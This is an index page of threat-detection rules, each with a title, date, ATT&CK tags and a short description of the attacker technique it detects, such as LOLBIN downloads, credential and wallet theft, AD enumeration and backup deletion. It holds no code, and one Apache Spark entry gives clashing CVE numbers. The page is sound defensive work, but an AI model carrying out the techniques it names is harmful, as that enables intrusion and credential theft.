Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Aug 29, 2024 · attack.defense-evasion attack.t1218.011 ·
Share on:

Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

Read More
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths

Aug 29, 2024 · attack.execution ·
Share on:

Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.

Read More
COM Object Execution via Xwizard.EXE

Aug 29, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.

Read More
New Capture Session Launched Via DXCap.EXE

Aug 29, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.

Read More
Potential DLL Injection Via AccCheckConsole

Aug 29, 2024 · attack.execution detection.threat-hunting ·
Share on:

Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.

Read More
Potential DLL Sideloading Using Coregen.exe

Aug 29, 2024 · attack.defense-evasion attack.t1218 attack.t1055 ·
Share on:

Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

Read More
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

Aug 29, 2024 · attack.credential-access attack.discovery attack.t1552 ·
Share on:

Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.

Read More
Process Memory Dump via RdrLeakDiag.EXE

Aug 29, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

Read More
Program Executed Using Proxy/Local Command Via SSH.EXE

Aug 29, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detect usage of the "ssh.exe" binary as a proxy to launch other programs.

Read More
Suspicious Child Process Of Wermgr.EXE

Aug 29, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 attack.t1036 ·
Share on:

Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

Read More
Uncommon Sigverif.EXE Child Process

Aug 29, 2024 · attack.defense-evasion attack.t1216 ·
Share on:

Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.

Read More
Windows Binary Executed From WSL

Aug 29, 2024 · attack.execution attack.defense-evasion attack.t1202 ·
Share on:

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

Read More
Wusa.EXE Executed By Parent Process Located In Suspicious Location

Aug 29, 2024 · attack.execution ·
Share on:

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.

Read More
Xwizard.EXE Execution From Non-Default Location

Aug 29, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

Detects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".

Read More
Potential Active Directory Reconnaissance/Enumeration Via LDAP

Aug 27, 2024 · attack.discovery attack.t1069.002 attack.t1087.002 attack.t1482 ·
Share on:

Detects potential Active Directory enumeration via LDAP

Read More
Disable Important Scheduled Task

Aug 26, 2024 · attack.impact attack.t1489 ·
Share on:

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

Read More
DNS Query To Put.io - DNS Client

Aug 23, 2024 · attack.command-and-control ·
Share on:

Detects DNS queries for subdomains related to "Put.io" sharing website.

Read More
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location

Aug 23, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.

Read More
Suspicious Download From File-Sharing Website Via Bitsadmin

Aug 23, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003 ·
Share on:

Detects usage of bitsadmin downloading a file from a suspicious domain

Read More
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Aug 23, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.

Read More
Suspicious Remote AppX Package Locations

Aug 23, 2024 · attack.defense-evasion ·
Share on:

Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain.

Read More
Driver Added To Disallowed Images In HVCI - Registry

Aug 21, 2024 · attack.defense-evasion ·
Share on:

Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.

Read More
Hidden Flag Set On File/Directory Via Chflags - MacOS

Aug 21, 2024 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105 ·
Share on:

Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.

Read More
User Risk and MFA Registration Policy Updated

Aug 21, 2024 · attack.persistence ·
Share on:

Detects changes and updates to the user risk and MFA registration policy. Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.

Read More
Multi Factor Authentication Disabled For User Account

Aug 21, 2024 · attack.credential-access attack.persistence ·
Share on:

Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.

Read More
Data Export From MSSQL Table Via BCP.EXE

Aug 20, 2024 · attack.execution attack.t1048 ·
Share on:

Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.

Read More
Potentially Suspicious Rundll32.EXE Execution of UDL File

Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071 ·
Share on:

Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.

Read More
Suspicious Rundll32 Execution of UDL File

Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071 ·
Share on:

Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse the technique as a phishing vector to capture authentication credentials or other sensitive data.

Read More
Diskshadow Script Mode - Execution From Potential Suspicious Location

Aug 16, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.

Read More
HackTool - LaZagne Execution

Aug 16, 2024 · attack.credential-access ·
Share on:

Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials.

Read More
Capture Wi-Fi password

Aug 14, 2024 ·
Share on:

Capture Wi-Fi password

Read More
Powershell Token Obfuscation - Powershell

Aug 13, 2024 · attack.defense-evasion attack.t1027.009 ·
Share on:

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Read More
7Zip Compressing Dump Files

Aug 12, 2024 · attack.collection attack.t1560.001 ·
Share on:

Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

Read More
A Member Was Added to a Security-Enabled Global Group

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects activity when a member is added to a security-enabled global group

Read More
A Member Was Removed From a Security-Enabled Global Group

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects activity when a member is removed from a security-enabled global group

Read More
A New Trust Was Created To A Domain

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Addition of domains is seldom and should be verified for legitimacy.

Read More
A Security-Enabled Global Group Was Deleted

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects activity when a security-enabled global group is deleted

Read More
Abusable DLL Potential Sideloading From Suspicious Location

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations

Read More
Abuse of Service Permissions to Hide Services Via Set-Service

Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011 ·
Share on:

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Read More
Abuse of Service Permissions to Hide Services Via Set-Service - PS

Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011 ·
Share on:

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Read More
Abused Debug Privilege by Arbitrary Parent Processes

Aug 12, 2024 · attack.privilege-escalation attack.t1548 ·
Share on:

Detection of unusual child processes by different system processes

Read More
Abusing Print Executable

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Attackers can use print.exe for remote file copy

Read More
Access To ADMIN$ Network Share

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

Detects access to ADMIN$ network share

Read More
Access to Browser Login Data

Aug 12, 2024 · attack.credential-access attack.t1555.003 ·
Share on:

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

Read More
Access To Crypto Currency Wallets By Uncommon Applications

Aug 12, 2024 · attack.t1003 attack.credential-access ·
Share on:

Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.

Read More
Access To Potentially Sensitive Sysvol Files By Uncommon Applications

Aug 12, 2024 · attack.credential-access attack.t1552.006 ·
Share on:

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

Read More
Access To Windows Credential History File By Uncommon Applications

Aug 12, 2024 · attack.credential-access attack.t1555.004 ·
Share on:

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function

Read More
Access To Windows DPAPI Master Keys By Uncommon Applications

Aug 12, 2024 · attack.credential-access attack.t1555.004 ·
Share on:

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function

Read More
Account Created And Deleted Within A Close Time Frame

Aug 12, 2024 · attack.defense-evasion attack.t1078 ·
Share on:

Detects when an account was created and deleted in a short period of time.

Read More
Account Disabled or Blocked for Sign in Attempts

Aug 12, 2024 · attack.initial-access attack.t1078.004 ·
Share on:

Detects when an account is disabled or blocked for sign in but tried to log in

Read More
Account Lockout

Aug 12, 2024 · attack.credential-access attack.t1110 ·
Share on:

Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.

Read More
Account Tampering - Suspicious Failed Logon Reasons

Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access attack.t1078 ·
Share on:

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

Read More
Activate Suppression of Windows Security Center Notifications

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect set Notification_Suppress to 1 to disable the Windows security center notification

Read More
Active Directory Computers Enumeration With Get-AdComputer

Aug 12, 2024 · attack.discovery attack.t1018 attack.t1087.002 ·
Share on:

Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.

Read More
Active Directory Database Snapshot Via ADExplorer

Aug 12, 2024 · attack.credential-access attack.t1552.001 attack.t1003.003 ·
Share on:

Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.

Read More
Active Directory Group Enumeration With Get-AdGroup

Aug 12, 2024 · attack.discovery attack.t1069.002 ·
Share on:

Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory

Read More
Active Directory Kerberos DLL Loaded Via Office Application

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects Kerberos DLL being loaded by an Office Product

Read More
Active Directory Parsing DLL Loaded Via Office Application

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects DSParse DLL being loaded by an Office Product

Read More
Active Directory Replication from Non Machine Account

Aug 12, 2024 · attack.credential-access attack.t1003.006 ·
Share on:

Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.

Read More
Active Directory Structure Export Via Csvde.EXE

Aug 12, 2024 · attack.exfiltration attack.discovery attack.t1087.002 ·
Share on:

Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.

Read More
Active Directory Structure Export Via Ldifde.EXE

Aug 12, 2024 · attack.exfiltration ·
Share on:

Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.

Read More
Activity From Anonymous IP Address

Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access ·
Share on:

Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

Read More
Activity from Anonymous IP Addresses

Aug 12, 2024 · attack.command-and-control attack.t1573 ·
Share on:

Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.

Read More
Activity from Infrequent Country

Aug 12, 2024 · attack.command-and-control attack.t1573 ·
Share on:

Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.

Read More
Activity from Suspicious IP Addresses

Aug 12, 2024 · attack.command-and-control attack.t1573 ·
Share on:

Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.

Read More
Activity Performed by Terminated User

Aug 12, 2024 · attack.impact ·
Share on:

Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

Read More
AD Groups Or Users Enumeration Using PowerShell - PoshModule

Aug 12, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Read More
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

Aug 12, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Read More
AD Object WriteDAC Access

Aug 12, 2024 · attack.defense-evasion attack.t1222.001 ·
Share on:

Detects WRITE_DAC access to a domain object

Read More
AD Privileged Users or Groups Reconnaissance

Aug 12, 2024 · attack.discovery attack.t1087.002 ·
Share on:

Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs

Read More
ADCS Certificate Template Configuration Vulnerability

Aug 12, 2024 · attack.privilege-escalation attack.credential-access ·
Share on:

Detects certificate creation with template allowing risk permission subject

Read More
ADCS Certificate Template Configuration Vulnerability with Risky EKU

Aug 12, 2024 · attack.privilege-escalation attack.credential-access ·
Share on:

Detects certificate creation with template allowing risk permission subject and risky EKU

Read More
Add Debugger Entry To AeDebug For Persistence

Aug 12, 2024 · attack.persistence ·
Share on:

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes

Read More
Add Debugger Entry To Hangs Key For Persistence

Aug 12, 2024 · attack.persistence ·
Share on:

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes

Read More
Add DisallowRun Execution to Registry

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect set DisallowRun to 1 to prevent user running specific computer program

Read More
Add Insecure Download Source To Winget

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059 ·
Share on:

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

Read More
Add New Download Source To Winget

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059 ·
Share on:

Detects usage of winget to add new additional download sources

Read More
Add or Remove Computer from DC

Aug 12, 2024 · attack.defense-evasion attack.t1207 ·
Share on:

Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

Read More
Add SafeBoot Keys Via Reg Utility

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not

Read More
Add Windows Capability Via PowerShell Cmdlet

Aug 12, 2024 · attack.execution ·
Share on:

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Read More
Add Windows Capability Via PowerShell Script

Aug 12, 2024 · attack.execution ·
Share on:

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Read More
Added Credentials to Existing Application

Aug 12, 2024 · attack.t1098.001 attack.persistence ·
Share on:

Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.

Read More
Added Owner To Application

Aug 12, 2024 · attack.t1552 attack.credential-access ·
Share on:

Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.

Read More
AddinUtil.EXE Execution From Uncommon Directory

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

Read More
Addition of SID History to Active Directory Object

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1134.005 ·
Share on:

An attacker can use the SID history attribute to gain additional privileges.

Read More
ADFS Database Named Pipe Connection By Uncommon Tool

Aug 12, 2024 · attack.collection attack.t1005 ·
Share on:

Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.

Read More
Admin User Remote Logon

Aug 12, 2024 · attack.lateral-movement attack.t1078.001 attack.t1078.002 attack.t1078.003 car.2016-04-005 ·
Share on:

Detect remote login by Administrator user (depending on internal pattern).

Read More
ADSelfService Exploitation

Aug 12, 2024 · cve.2021-40539 detection.emerging-threats attack.initial-access attack.t1190 ·
Share on:

Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539

Read More
ADSI-Cache File Creation By Uncommon Tool

Aug 12, 2024 · attack.t1001.003 attack.command-and-control ·
Share on:

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

Read More
Advanced IP Scanner - File Event

Aug 12, 2024 · attack.discovery attack.t1046 ·
Share on:

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Read More
Adwind RAT / JRAT

Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 detection.emerging-threats ·
Share on:

Detects javaw.exe in AppData folder as used by Adwind / JRAT

Read More
Adwind RAT / JRAT File Artifact

Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 ·
Share on:

Detects javaw.exe in AppData folder as used by Adwind / JRAT

Read More
AgentExecutor PowerShell Execution

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument

Read More
All Backups Deleted Via Wbadmin.EXE

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.

Read More
Allow RDP Remote Assistance Feature

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detect enable rdp feature to allow specific user to rdp connect on the targeted machine

Read More
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

Aug 12, 2024 · attack.persistence attack.t1543.003 ·
Share on:

Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

Read More
Alternate PowerShell Hosts - PowerShell Module

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

Read More
Always Install Elevated MSI Spawned Cmd And Powershell

Aug 12, 2024 · attack.privilege-escalation attack.t1548.002 ·
Share on:

Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"

Read More
AMSI Bypass Pattern Assembly GetType

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.execution ·
Share on:

Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts

Read More
Amsi.DLL Loaded Via LOLBIN Process

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack

Read More
Anomalous Token

Aug 12, 2024 · attack.t1528 attack.credential-access ·
Share on:

Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.

Read More
Anomalous User Activity

Aug 12, 2024 · attack.t1098 attack.persistence ·
Share on:

Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.

Read More
Anonymous IP Address

Aug 12, 2024 · attack.t1528 attack.credential-access ·
Share on:

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

Read More
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection

Aug 12, 2024 · attack.privilege-escalation attack.t1055 ·
Share on:

Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .

Read More
Anydesk Temporary Artefact

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Read More
Apache Segmentation Fault

Aug 12, 2024 · attack.impact attack.t1499.004 ·
Share on:

Detects a segmentation fault error message caused by a crashing apache worker process

Read More
Apache Spark Shell Command Injection - ProcessCreation

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891 ·
Share on:

Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective

Read More
Apache Spark Shell Command Injection - Weblogs

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-33891 detection.emerging-threats ·
Share on:

Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective

Read More
Apache Threading Error

Aug 12, 2024 · attack.initial-access attack.lateral-movement attack.t1190 attack.t1210 ·
Share on:

Detects an issue in apache logs that reports threading related errors

Read More
App Granted Microsoft Permissions

Aug 12, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD

Read More
App Granted Privileged Delegated Or App Permissions

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1098.003 ·
Share on:

Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions

Read More
Application AppID Uri Configuration Changes

Aug 12, 2024 · attack.persistence attack.credential-access attack.privilege-escalation attack.t1552 attack.t1078.004 ·
Share on:

Detects when a configuration change is made to an applications AppID URI.

Read More
Application Removed Via Wmic.EXE

Aug 12, 2024 · attack.execution attack.t1047 ·
Share on:

Detects the removal or uninstallation of an application via "Wmic.EXE".

Read More
Application Terminated Via Wmic.EXE

Aug 12, 2024 · attack.execution attack.t1047 ·
Share on:

Detects calls to the "terminate" function via wmic in order to kill an application

Read More
Application Uninstalled

Aug 12, 2024 · attack.impact attack.t1489 ·
Share on:

An application has been removed. Check if it is critical.

Read More
Application URI Configuration Changes

Aug 12, 2024 · attack.t1528 attack.t1078.004 attack.persistence attack.credential-access attack.privilege-escalation ·
Share on:

Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.

Read More
Application Using Device Code Authentication Flow

Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access ·
Share on:

Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

Read More
Applications That Are Using ROPC Authentication Flow

Aug 12, 2024 · attack.t1078 attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access ·
Share on:

Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

Read More
AppX Package Installation Attempts Via AppInstaller.EXE

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL

Read More
APT PRIVATELOG Image Load Pattern

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 detection.emerging-threats ·
Share on:

Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances

Read More
APT User Agent

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects suspicious user agent strings used in APT malware in proxy logs

Read More
APT27 - Emissary Panda Activity

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 attack.g0027 detection.emerging-threats ·
Share on:

Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27

Read More
APT29 2018 Phishing Campaign CommandLine Indicators

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.011 detection.emerging-threats ·
Share on:

Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant

Read More
APT29 2018 Phishing Campaign File Indicators

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant

Read More
APT31 Judgement Panda Activity

Aug 12, 2024 · attack.lateral-movement attack.credential-access attack.g0128 attack.t1003.001 attack.t1560.001 detection.emerging-threats ·
Share on:

Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report

Read More
APT40 Dropbox Tool User Agent

Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.exfiltration attack.t1567.002 ·
Share on:

Detects suspicious user agent string of APT40 Dropbox tool

Read More
Arbitrary Binary Execution Using GUP Utility

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

Read More
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.

Read More
Arbitrary File Download Via ConfigSecurityPolicy.EXE

Aug 12, 2024 · attack.exfiltration attack.t1567 ·
Share on:

Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.

Read More
Arbitrary File Download Via GfxDownloadWrapper.EXE

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.

Read More
Arbitrary File Download Via MSOHTMED.EXE

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of "MSOHTMED" to download arbitrary files

Read More
Arbitrary File Download Via MSPUB.EXE

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files

Read More
Arbitrary File Download Via PresentationHost.EXE

Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218 ·
Share on:

Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files

Read More
Arbitrary MSI Download Via Devinit.EXE

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218 ·
Share on:

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

Read More
Arbitrary Shell Command Execution Via Settingcontent-Ms

Aug 12, 2024 · attack.t1204 attack.t1566.001 attack.execution attack.initial-access ·
Share on:

The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

Read More
Arcadyan Router Exploitations

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-20090 cve.2021-20091 detection.emerging-threats ·
Share on:

Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.

Read More
Aruba Network Service Potential DLL Sideloading

Aug 12, 2024 · attack.privilege-escalation attack.persistence attack.t1574.001 attack.t1574.002 ·
Share on:

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

Read More
AspNetCompiler Execution

